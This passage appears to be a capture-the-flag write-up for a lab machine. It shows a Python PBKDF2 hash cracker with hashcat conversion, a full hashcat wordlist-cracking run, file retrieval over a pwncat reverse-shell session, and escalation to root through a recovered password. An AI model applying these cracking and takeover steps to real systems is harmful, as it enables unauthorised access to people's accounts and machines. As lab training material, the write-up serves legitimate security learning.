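def parse_algo(algo: str):
    """'pbdf2$50500$60' -> (iterations, derived-key length in bytes)."""
    _name, iterations, dklen = algo.split("$")
    return int(iterations), int(dklen)


def to_hashcat_10900(salt_hex: str, digest_hex: str, iterations: int) -> str:
    """hashcat -m 10900 line: sha256:<iter>:<b64 salt>:<b64 digest> (standard base64, padded)."""
    salt_b64 = base64.b64encode(binascii.unhexlify(salt_hex)).decode()
    digest_b64 = base64.b64encode(binascii.unhexlify(digest_hex)).decode()
    return f"sha256:{iterations}:{salt_b64}:{digest_b64}"


def check_password(password: str, salt_hex: str, digest_hex: str, iterations: int, dklen: int) -> bool:
    """Recompute PBKDF2-HMAC-SHA256 with the stored parameters and compare in constant time."""
    digest = binascii.unhexlify(digest_hex)
    if len(digest) != dklen:
        raise ValueError(f"digest is {len(digest)} bytes but algo says dklen={dklen}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    binascii.unhexlify(salt_hex), iterations, dklen)
    return hmac.compare_digest(candidate, digest)


def crack(candidates, salt_hex=SALT_HEX, digest_hex=DIGEST_HEX, algo=ALGO):
    """Return the first candidate that reproduces the stored digest, else None."""
    iterations, dklen = parse_algo(algo)
    for pw in candidates:
        pw = pw.rstrip("\r\n")
        if check_password(pw, salt_hex, digest_hex, iterations, dklen):
            return pw
    return None


if __name__ == "__main__":
    print(to_hashcat_10900(SALT_HEX, DIGEST_HEX, parse_algo(ALGO)[0]))
    print(crack(["123456", "password", "1qaz2wsx"]))
```

Note that the derived key here is 60 bytes, not the 32 bytes of a single SHA-256 block, so the tool must honour dklen exactly: a checker that truncates to 32 bytes, or a hashcat line built with the wrong digest length, never matches even with the right password.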

It runs quickly after all

❯ hashcat -a 0 -m 10900 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12600KF, 2917/5898 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA:1qaz2wsx

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT...SGXEHA
Time.Started.....: Tue Apr 1 16:32:52 2025 (2 secs)
Time.Estimated...: Tue Apr 1 16:32:54 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1048 H/s (9.48ms) @ Accel:512 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:50432-50499
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> lovers1

Started: Tue Apr 1 16:32:52 2025
Stopped: Tue Apr 1 16:32:56 2025

PoC exploitation

The user's home directory also contains a hidden .secret folder

Download the archive to the attacking machine

debian@Newbee:~$ cd .secret/
debian@Newbee:~/.secret$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Mar 25 08:02 .
drwx------ 5 debian debian 4096 Apr 1 03:46 ..
-rw-r--r-- 1 root root 48 Mar 25 07:56 hint.txt
-rw-r--r-- 1 root root 758 Mar 25 08:00 password.zip
debian@Newbee:~/.secret$ cat hint.txt
password is md5(key)

and key is in mysql!!!!!!
debian@Newbee:~/.secret$ echo -n "1qaz2wsx"|md5sum
1c63129ae9db9c60c3e8aa94d3e00495 -
debian@Newbee:~/.secret$
(local) pwncat$ download password.zip
password.zip ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 758/758 bytes • ? • 0:00:00
[16:52:14] downloaded 758.00B in 0.15 seconds download.py:71
(local) pwncat$

(remote) debian@Newbee:/home/debian/.secret$

Opening the image inside the archive shows what looks like pixelated text

[screenshot]

spipm/Depixelization_poc: Depix is a PoC for a technique to recover plaintext from pixelized screenshots.

A keyword search turns up this GitHub project for recovering pixelated text

To recover text from such an image you also need a De Bruijn sequence image rendered with the same font and settings

and installing the Python dependencies is a hassle

But look closely: the image appears identical to the example image shipped with the project

[screenshot]

So the password is hellofromtheotherside

(remote) debian@Newbee:/home/debian/.secret$ su root
Password:
root@Newbee:/home/debian/.secret# cd ~
root@Newbee:~# cat root.txt
c18b3eff03996f3a203f63733be03d15
root@Newbee:~#